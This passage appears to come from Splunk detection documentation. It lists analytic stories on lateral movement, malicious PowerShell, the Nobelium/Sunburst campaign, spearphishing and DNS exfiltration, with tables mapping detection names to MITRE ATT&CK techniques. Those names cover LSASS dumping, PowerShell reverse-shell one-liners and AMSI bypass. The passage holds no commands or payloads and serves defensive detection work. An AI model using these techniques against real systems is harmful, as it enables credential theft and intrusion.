| Detect Exchange Web Shell | T1505.003, T1190, T1059.001 | Web Shell, Exploit Public-Facing Application, PowerShell | Persistence, Initial Access, Execution | TTP |
| Detect New Local Admin account | T1136.001 | Local Account | Persistence | TTP |
| Detect PsExec With accepteula Flag | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | TTP |
| Detect Renamed PSExec | T1569.002 | Service Execution | Execution | Hunting |
| Dump LSASS via comsvcs DLL | T1003.001 | LSASS Memory | Credential Access | TTP |
| Dump LSASS via procdump | T1003.001 | LSASS Memory | Credential Access | TTP |
| Email servers sending high volume traffic to hosts | T1114.002 | Remote Email Collection | Collection | Anomaly |
| Malicious PowerShell Process - Connect To Internet With Hidden Window | T1059.001, T1547.001 | PowerShell, Registry Run Keys / Startup Folder | Execution, Persistence, Privilege Escalation | TTP |
| Malicious PowerShell Process - Execution Policy Bypass | T1059.001 | PowerShell | Execution | TTP |
| Nishang PowershellTCPOneLine | T1059.001 | PowerShell | Execution | TTP |
| Ntdsutil Export NTDS | T1003.003 | NTDS | Credential Access | TTP |
| Set Default PowerShell Execution Policy To Unrestricted or Bypass | T1059.001 | PowerShell | Execution | TTP |
| Unified Messaging Service Spawning a Process | T1190 | Exploit Public-Facing Application | Initial Access | TTP |
| W3WP Spawning Shell | T1505.003 | Web Shell | Persistence | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Execution
  • Exploitation
  • Installation
  • Lateral Movement


Reference


version: 1


Ingress tool transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external, adversary-controlled system through the command and control channel to bring tools into the victim network, or through alternate protocols with another tool such as FTP.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-24
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Any Powershell DownloadFile | T1059.001, T1197, T1105, T1003, T1021, T1113, T1123, T1563, T1053, T1134, T1548, T1055, T1106, T1569, T1027, T1027.005, T1546.015, T1140, T1592, T1562 | PowerShell, BITS Jobs, Ingress Tool Transfer, OS Credential Dumping, Remote Services, Screen Capture, Audio Capture, Remote Service Session Hijacking, Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism, Process Injection, Native API, System Services, Obfuscated Files or Information, Indicator Removal from Tools, Component Object Model Hijacking, Deobfuscate/Decode Files or Information, Gather Victim Host Information, Impair Defenses | Execution, Defense Evasion, Persistence, Command And Control, Credential Access, Lateral Movement, Collection, Collection, Lateral Movement, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Defense Evasion, Privilege Escalation, Execution, Execution, Defense Evasion, Defense Evasion, Privilege Escalation, Persistence, Defense Evasion, Reconnaissance, Defense Evasion | TTP |
| Any Powershell DownloadString | T1059.001, T1505.003, T1136.001, T1021.002, T1569.002, T1003.001, T1114.002, T1003.003, T1190 | PowerShell, Web Shell, Local Account, SMB/Windows Admin Shares, Service Execution, LSASS Memory, Remote Email Collection, NTDS, Exploit Public-Facing Application | Execution, Persistence, Persistence, Lateral Movement, Execution, Credential Access, Collection, Credential Access, Initial Access | TTP |
| BITSAdmin Download File | T1197, T1105 | BITS Jobs, Ingress Tool Transfer | Defense Evasion, Persistence, Command And Control | TTP |
| CertUtil Download With URLCache and Split Arguments | T1105 | Ingress Tool Transfer | Command And Control | TTP |
| CertUtil Download With VerifyCtl and Split Arguments | T1105 | Ingress Tool Transfer | Command And Control | TTP |
| Suspicious Curl Network Connection | T1105, T1543.001, T1074 | Ingress Tool Transfer, Launch Agent, Data Staged | Command And Control, Persistence, Privilege Escalation, Collection | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Lateral movement

Detect and investigate tactics, techniques, and procedures around how attackers move laterally within the enterprise. Because lateral movement can expose the adversary to detection, it should be an important focus for security analysts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Detect Activity Related to Pass the Hash Attacks | T1550.002, T1021.002, T1569.002, T1558.003, T1021.001, T1053.005 | Pass the Hash, SMB/Windows Admin Shares, Service Execution, Kerberoasting, Remote Desktop Protocol, Scheduled Task | Defense Evasion, Lateral Movement, Lateral Movement, Execution, Credential Access, Lateral Movement, Execution, Persistence, Privilege Escalation | TTP |
| Detect Pass the Hash | T1550.002 | Pass the Hash | Defense Evasion, Lateral Movement | TTP |
| Detect PsExec With accepteula Flag | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | TTP |
| Detect Renamed PSExec | T1569.002 | Service Execution | Execution | Hunting |
| Kerberoasting spn request with RC4 encryption | T1558.003 | Kerberoasting | Credential Access | TTP |
| Potential Pass the Token or Hash Observed at the Destination Device | T1550.002 | Pass the Hash | Defense Evasion, Lateral Movement | TTP |
| Potential Pass the Token or Hash Observed by an Event Collecting Device | T1550.002 | Pass the Hash | Defense Evasion, Lateral Movement | TTP |
| Remote Desktop Network Traffic | T1021.001 | Remote Desktop Protocol | Lateral Movement | Anomaly |
| Remote Desktop Process Running On System | T1021.001 | Remote Desktop Protocol | Lateral Movement | Hunting |
| Schtasks scheduling job on remote system | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Execution
  • Exploitation
  • Lateral Movement


Reference


version: 2


Malicious powershell

Attackers are finding stealthy ways to "live off the land," leveraging utilities and tools that come standard on the endpoint--such as PowerShell--to achieve their goals without downloading binary files. These searches can help you detect and investigate PowerShell command-line options that may be indicative of malicious intent.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2017-08-23
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Any Powershell DownloadFile | T1059.001, T1197, T1105, T1003, T1021, T1113, T1123, T1563, T1053, T1134, T1548, T1055, T1106, T1569, T1027, T1027.005, T1546.015, T1140, T1592, T1562 | PowerShell, BITS Jobs, Ingress Tool Transfer, OS Credential Dumping, Remote Services, Screen Capture, Audio Capture, Remote Service Session Hijacking, Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism, Process Injection, Native API, System Services, Obfuscated Files or Information, Indicator Removal from Tools, Component Object Model Hijacking, Deobfuscate/Decode Files or Information, Gather Victim Host Information, Impair Defenses | Execution, Defense Evasion, Persistence, Command And Control, Credential Access, Lateral Movement, Collection, Collection, Lateral Movement, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Defense Evasion, Privilege Escalation, Execution, Execution, Defense Evasion, Defense Evasion, Privilege Escalation, Persistence, Defense Evasion, Reconnaissance, Defense Evasion | TTP |
| Any Powershell DownloadString | T1059.001, T1505.003, T1136.001, T1021.002, T1569.002, T1003.001, T1114.002, T1003.003, T1190 | PowerShell, Web Shell, Local Account, SMB/Windows Admin Shares, Service Execution, LSASS Memory, Remote Email Collection, NTDS, Exploit Public-Facing Application | Execution, Persistence, Persistence, Lateral Movement, Execution, Credential Access, Collection, Credential Access, Initial Access | TTP |
| Credential Extraction indicative of use of DSInternals credential conversion modules | T1003 | OS Credential Dumping | Credential Access | TTP |
| Credential Extraction indicative of use of DSInternals modules | T1003 | OS Credential Dumping | Credential Access | TTP |
| Credential Extraction indicative of use of PowerSploit modules | T1003 | OS Credential Dumping | Credential Access | TTP |
| Credential Extraction via Get-ADDBAccount module present in PowerSploit and DSInternals | T1003 | OS Credential Dumping | Credential Access | TTP |
| Detect Empire with PowerShell Script Block Logging | T1059.001 | PowerShell | Execution | TTP |
| Detect Mimikatz With PowerShell Script Block Logging | T1003 | OS Credential Dumping | Credential Access | TTP |
| Illegal Access To User Content via PowerSploit modules | T1021, T1113, T1123, T1563 | Remote Services, Screen Capture, Audio Capture, Remote Service Session Hijacking | Lateral Movement, Collection, Collection, Lateral Movement | TTP |
| Illegal Privilege Elevation and Persistence via PowerSploit modules | T1053, T1134, T1548 | Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism | Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion | TTP |
| Illegal Service and Process Control via PowerSploit modules | T1055, T1106, T1569 | Process Injection, Native API, System Services | Defense Evasion, Privilege Escalation, Execution, Execution | TTP |
| Malicious PowerShell Process - Connect To Internet With Hidden Window | T1059.001, T1547.001 | PowerShell, Registry Run Keys / Startup Folder | Execution, Persistence, Privilege Escalation | TTP |
| Malicious PowerShell Process - Encoded Command | T1027 | Obfuscated Files or Information | Defense Evasion | Hunting |
| Malicious PowerShell Process With Obfuscation Techniques | T1059.001 | PowerShell | Execution | TTP |
| PowerShell 4104 Hunting | T1059.001 | PowerShell | Execution | Hunting |
| PowerShell Domain Enumeration | T1059.001 | PowerShell | Execution | TTP |
| PowerShell Loading DotNET into Memory via System Reflection Assembly | T1059.001 | PowerShell | Execution | TTP |
| Powershell Creating Thread Mutex | T1027.005 | Indicator Removal from Tools | Defense Evasion | TTP |
| Powershell Enable SMB1Protocol Feature | T1027.005 | Indicator Removal from Tools | Defense Evasion | TTP |
| Powershell Execute COM Object | T1546.015 | Component Object Model Hijacking | Privilege Escalation, Persistence | TTP |
| Powershell Fileless Process Injection via GetProcAddress | T1055, T1059.001 | Process Injection, PowerShell | Defense Evasion, Privilege Escalation, Execution | TTP |
| Powershell Fileless Script Contains Base64 Encoded Content | T1027, T1059.001 | Obfuscated Files or Information, PowerShell | Defense Evasion, Execution | TTP |
| Powershell Processing Stream Of Data | T1059.001 | PowerShell | Execution | TTP |
| Powershell Using memory As Backing Store | T1140 | Deobfuscate/Decode Files or Information | Defense Evasion | TTP |
| Recon AVProduct Through Pwh or WMI | T1592 | Gather Victim Host Information | Reconnaissance | TTP |
| Recon Using WMI Class | T1592 | Gather Victim Host Information | Reconnaissance | TTP |
| Set Default PowerShell Execution Policy To Unrestricted or Bypass | T1059.001 | PowerShell | Execution | TTP |
| Unloading AMSI via Reflection | T1562 | Impair Defenses | Defense Evasion | TTP |
| WMI Recon Running Process Or Services | T1592 | Gather Victim Host Information | Reconnaissance | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation
  • Installation
  • Privilege Escalation
  • Reconnaissance


Reference


version: 5


Masquerading - rename system utilities

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-04-26
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Execution of File with Multiple Extensions | T1036.003, T1127.001, T1218.011, T1127, T1036 | Rename System Utilities, MSBuild, Rundll32, Trusted Developer Utilities Proxy Execution, Masquerading | Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion | TTP |
| Suspicious MSBuild Rename | T1127.001, T1036.003 | MSBuild, Rename System Utilities | Defense Evasion, Defense Evasion | TTP |
| Suspicious Rundll32 Rename | T1218.011, T1036.003 | Rundll32, Rename System Utilities | Defense Evasion, Defense Evasion | Hunting |
| Suspicious microsoft workflow compiler rename | T1127, T1036.003 | Trusted Developer Utilities Proxy Execution, Rename System Utilities | Defense Evasion, Defense Evasion | Hunting |
| Suspicious msbuild path | T1127.001, T1036.003 | MSBuild, Rename System Utilities | Defense Evasion, Defense Evasion | TTP |
| System Process Running from Unexpected Location | T1036 | Masquerading | Defense Evasion | Anomaly |
| System Processes Run From Unexpected Locations | T1036.003 | Rename System Utilities | Defense Evasion | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Meterpreter

Meterpreter provides red teams, pen testers and threat actors interactive access to a compromised host to run commands, upload payloads, download files, and other actions.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-06-08
  • Use Case: Advanced Threat Detection

Microsoft mshtml remote code execution cve-2021-40444

CVE-2021-40444 is a remote code execution vulnerability in MSHTML, recently used to deliver targeted spearphishing documents.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-09-08
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Control Loading from World Writable Directory | T1218.002, T1566.001, T1218.011 | Control Panel, Spearphishing Attachment, Rundll32 | Defense Evasion, Initial Access, Defense Evasion | TTP |
| MSHTML Module Load in Office Product | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Writing cab or inf | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Spawning Control | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Rundll32 Control RunDLL Hunt | T1218.011 | Rundll32 | Defense Evasion | Hunting |
| Rundll32 Control RunDLL World Writable Directory | T1218.011 | Rundll32 | Defense Evasion | TTP |

Kill Chain Phase

  • Exploitation


Reference


version: 1


Nobelium group

Sunburst is a trojanized update to the SolarWinds Orion IT monitoring and management software. It was discovered by FireEye in December 2020. The actors behind this campaign gained access to numerous public and private organizations around the world.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic, Web
  • Last Updated: 2020-12-14
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Anomalous usage of 7zip | T1560.001, T1059.003, T1543.003, T1055, T1071.002, T1218.010, T1218.005, T1569.002, T1027, T1218.011, T1053.005, T1548, T1203, T1505.003, T1127.001, T1036.003, T1127, T1071.001, T1018 | Archive via Utility, Windows Command Shell, Windows Service, Process Injection, File Transfer Protocols, Regsvr32, Mshta, Service Execution, Obfuscated Files or Information, Rundll32, Scheduled Task, Abuse Elevation Control Mechanism, Exploitation for Client Execution, Web Shell, MSBuild, Rename System Utilities, Trusted Developer Utilities Proxy Execution, Web Protocols, Remote System Discovery | Collection, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Command And Control, Defense Evasion, Defense Evasion, Execution, Defense Evasion, Defense Evasion, Execution, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Execution, Persistence, Defense Evasion, Defense Evasion, Defense Evasion, Command And Control, Discovery | Anomaly |
| Detect Outbound SMB Traffic | T1071.002 | File Transfer Protocols | Command And Control | TTP |
| Detect Prohibited Applications Spawning cmd exe | T1059.003, T1059, T1068, T1036.003 | Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities | Execution, Execution, Privilege Escalation, Defense Evasion | Hunting |
| Detect Rundll32 Inline HTA Execution | T1218.005 | Mshta | Defense Evasion | TTP |
| First Time Seen Running Windows Service | T1569.002, T1055, T1106, T1569, T1574.011, T1543.003 | Service Execution, Process Injection, Native API, System Services, Services Registry Permissions Weakness, Windows Service | Execution, Defense Evasion, Privilege Escalation, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation | Anomaly |
| Malicious PowerShell Process - Encoded Command | T1027 | Obfuscated Files or Information | Defense Evasion | Hunting |
| Sc exe Manipulating Windows Services | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP |
| Scheduled Task Deleted Or Created via CMD | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP |
| Schtasks scheduling job on remote system | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP |
| Sunburst Correlation DLL and Network Event | T1203 | Exploitation for Client Execution | Execution | TTP |
| Supernova Webshell | T1505.003 | Web Shell | Persistence | TTP |
| TOR Traffic | T1071.001 | Web Protocols | Command And Control | TTP |
| Windows AdFind Exe | T1018 | Remote System Discovery | Discovery | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exfiltration
  • Exploitation
  • Installation


Reference


version: 2


Petitpotam ntlm relay on active directory certificate services

PetitPotam (CVE-2021-36942) is a vulnerability identified in Microsoft's EFSRPC protocol that can allow an unauthenticated account to escalate privileges to domain administrator, given the right circumstances.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-08-31
  • Use Case: Advanced Threat Detection

Possible backdoor activity associated with mudcarp espionage campaigns

Monitor your environment for suspicious behaviors that resemble the techniques employed by the MUDCARP threat group.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2020-01-22
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Malicious PowerShell Process - Connect To Internet With Hidden Window | T1059.001, T1547.001 | PowerShell, Registry Run Keys / Startup Folder | Execution, Persistence, Privilege Escalation | TTP |
| Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP |
| Unusually Long Command Line | | | | Anomaly |
| Unusually Long Command Line - MLTK | | | | Anomaly |

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 1


Proxyshell

ProxyShell is a chain of exploits targeting on-premise Microsoft Exchange Server - CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-08-24
  • Use Case: Advanced Threat Detection

Sql injection

Use the searches in this Analytic Story to help you detect structured query language (SQL) injection attempts characterized by long URLs that contain malicious parameters.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Web
  • Last Updated: 2017-09-19
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| SQL Injection with Long URLs | T1190 | Exploit Public-Facing Application | Initial Access | TTP |

Kill Chain Phase

  • Delivery


Reference


version: 1


Silver sparrow

Silver Sparrow, identified by Red Canary Intelligence, is a new forward-looking macOS (Intel and M1) malicious software downloader that uses JavaScript for execution and a LaunchAgent to establish persistence.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-02-24
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Suspicious Curl Network Connection | T1105, T1543.001, T1074 | Ingress Tool Transfer, Launch Agent, Data Staged | Command And Control, Persistence, Privilege Escalation, Collection | TTP |
| Suspicious PlistBuddy Usage | T1543.001 | Launch Agent | Persistence, Privilege Escalation | TTP |
| Suspicious PlistBuddy Usage via OSquery | T1543.001 | Launch Agent | Persistence, Privilege Escalation | TTP |
| Suspicious SQLite3 LSQuarantine Behavior | T1074 | Data Staged | Collection | TTP |

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Spearphishing attachments

Detect signs of malicious payloads that may indicate that your environment has been breached via a phishing attack.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2019-04-29
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Detect Outlook exe writing a zip file | T1566.001, T1003.002, T1566.002 | Spearphishing Attachment, Security Account Manager, Spearphishing Link | Initial Access, Credential Access, Initial Access | TTP |
| Excel Spawning PowerShell | T1003.002 | Security Account Manager | Credential Access | TTP |
| Excel Spawning Windows Script Host | T1003.002 | Security Account Manager | Credential Access | TTP |
| MSHTML Module Load in Office Product | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Application Spawn rundll32 process | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Document Creating Schedule Task | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Document Executing Macro Code | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Document Spawned Child Process To Download | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Spawning BITSAdmin | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Spawning CertUtil | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Spawning MSHTA | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Spawning Rundll32 with no DLL | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Spawning Wmic | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Product Writing cab or inf | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Office Spawning Control | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Process Creating LNK file in Suspicious Location | T1566.002 | Spearphishing Link | Initial Access | TTP |
| Winword Spawning Cmd | T1566.001 | Spearphishing Attachment | Initial Access | TTP |
| Winword Spawning PowerShell | T1566.001 | Spearphishing Attachment | Initial Access | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation


Reference


version: 1


Suspicious command-line executions

Leveraging the Windows command-line interface (CLI) is one of the most common attack techniques--one that is also detailed in the MITRE ATT&CK framework. Use this Analytic Story to help you identify unusual or suspicious use of the CLI on Windows systems.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2020-02-03
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Detect Prohibited Applications Spawning cmd exe | T1059.003, T1059, T1068, T1036.003 | Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities | Execution, Execution, Privilege Escalation, Defense Evasion | Hunting |
| Detect Prohibited Applications Spawning cmd exe | T1059 | Command and Scripting Interpreter | Execution | TTP |
| Detect Use of cmd exe to Launch Script Interpreters | T1059.003, T1072, T1547.001, T1021.002, T1566.001 | Windows Command Shell, Software Deployment Tools, Registry Run Keys / Startup Folder, SMB/Windows Admin Shares, Spearphishing Attachment | Execution, Execution, Lateral Movement, Persistence, Privilege Escalation, Lateral Movement, Initial Access | TTP |
| System Processes Run From Unexpected Locations | T1036.003 | Rename System Utilities | Defense Evasion | TTP |
| Unusually Long Command Line | | | | Anomaly |
| Unusually Long Command Line - MLTK | | | | Anomaly |

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Suspicious compiled html activity

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-02-11
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Detect HTML Help Renamed | T1218.001 | Compiled HTML File | Defense Evasion | Hunting |
| Detect HTML Help Spawn Child Process | T1218.001 | Compiled HTML File | Defense Evasion | TTP |
| Detect HTML Help URL in Command Line | T1218.001 | Compiled HTML File | Defense Evasion | TTP |
| Detect HTML Help Using InfoTech Storage Handlers | T1218.001 | Compiled HTML File | Defense Evasion | TTP |

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious dns traffic

Attackers often attempt to hide within or otherwise abuse the domain name system (DNS). You can thwart attempts to manipulate this omnipresent protocol by monitoring for these types of abuses.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Resolution
  • Last Updated: 2017-09-18
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| DNS Exfiltration Using Nslookup App | T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001 | Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols | Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control | TTP |
| DNS Query Length Outliers - MLTK | T1071.004 | DNS | Command And Control | Anomaly |
| DNS Query Length With High Standard Deviation | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | Anomaly |
| Detect hosts connecting to dynamic domain providers | T1189 | Drive-by Compromise | Initial Access | TTP |
| Excessive DNS Failures | T1071.004 | DNS | Command And Control | Anomaly |
| Excessive Usage of NSLOOKUP App | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | Anomaly |

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation


Reference


version: 1


Suspicious emails

Email remains one of the primary means for attackers to gain an initial foothold within the modern enterprise. Detect and investigate suspicious emails in your environment with the help of the searches in this Analytic Story.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • Last Updated: 2020-01-27
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Email Attachments With Lots Of Spaces | | | | Anomaly |
| Monitor Email For Brand Abuse | | | | TTP |
| Suspicious Email Attachment Extensions | T1566.001 | Spearphishing Attachment | Initial Access | Anomaly |

Kill Chain Phase

  • Delivery


Reference


version: 1


Suspicious mshta activity

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-01-20
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Detect MSHTA Url in Command Line | T1218.005, T1059.003, T1059, T1547.001 | Mshta, Windows Command Shell, Command and Scripting Interpreter, Registry Run Keys / Startup Folder | Defense Evasion, Execution, Execution, Persistence, Privilege Escalation | TTP |
| Detect Prohibited Applications Spawning cmd exe | T1059.003, T1059, T1068, T1036.003 | Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities | Execution, Execution, Privilege Escalation, Defense Evasion | Hunting |
| Detect Prohibited Applications Spawning cmd exe | T1059 | Command and Scripting Interpreter | Execution | TTP |
| Detect Rundll32 Inline HTA Execution | T1218.005 | Mshta | Defense Evasion | TTP |
| Detect mshta inline hta execution | T1218.005 | Mshta | Defense Evasion | TTP |
| Detect mshta renamed | T1218.005 | Mshta | Defense Evasion | Hunting |
| Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP |
| Suspicious mshta child process | T1218.005 | Mshta | Defense Evasion | TTP |
| Suspicious mshta spawn | T1218.005 | Mshta | Defense Evasion | TTP |

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Suspicious okta activity

Monitor your Okta environment for suspicious activities. Since the Covid outbreak, many organizations have been migrating more and more of their work to cloud services. Okta is a popular tool for managing multiple users and the web-based applications they need to stay productive. The searches in this story will help you monitor your Okta environment for suspicious activities and associated user behaviors.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-04-02
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Multiple Okta Users With Invalid Credentials From The Same IP | T1078.001 | Default Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | TTP
Okta Account Lockout Events | T1078.001 | Default Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Okta Failed SSO Attempts | T1078.001 | Default Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Okta User Logins From Multiple Cities | T1078.001 | Default Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly

Kill Chain Phase

Reference


version: 1


Suspicious regsvcs regasm activity

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-11
  • Use Case: Advanced Threat Detection

Suspicious regsvr32 activity

Monitor and detect techniques used by attackers who leverage the regsvr32.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-29
  • Use Case: Advanced Threat Detection

Suspicious rundll32 activity

Monitor and detect techniques used by attackers who leverage rundll32.exe to execute arbitrary malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-03
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Rundll32 Application Control Bypass - advpack | T1218.011, T1003.001, T1036.003 | Rundll32, LSASS Memory, Rename System Utilities | Defense Evasion, Credential Access, Defense Evasion | TTP
Detect Rundll32 Application Control Bypass - setupapi | T1218.011 | Rundll32 | Defense Evasion | TTP
Detect Rundll32 Application Control Bypass - syssetup | T1218.011 | Rundll32 | Defense Evasion | TTP
Dump LSASS via comsvcs DLL | T1003.001 | LSASS Memory | Credential Access | TTP
Rundll32 Control RunDLL Hunt | T1218.011 | Rundll32 | Defense Evasion | Hunting
Rundll32 Control RunDLL World Writable Directory | T1218.011 | Rundll32 | Defense Evasion | TTP
Rundll32 with no Command Line Arguments with Network | T1218.011 | Rundll32 | Defense Evasion | TTP
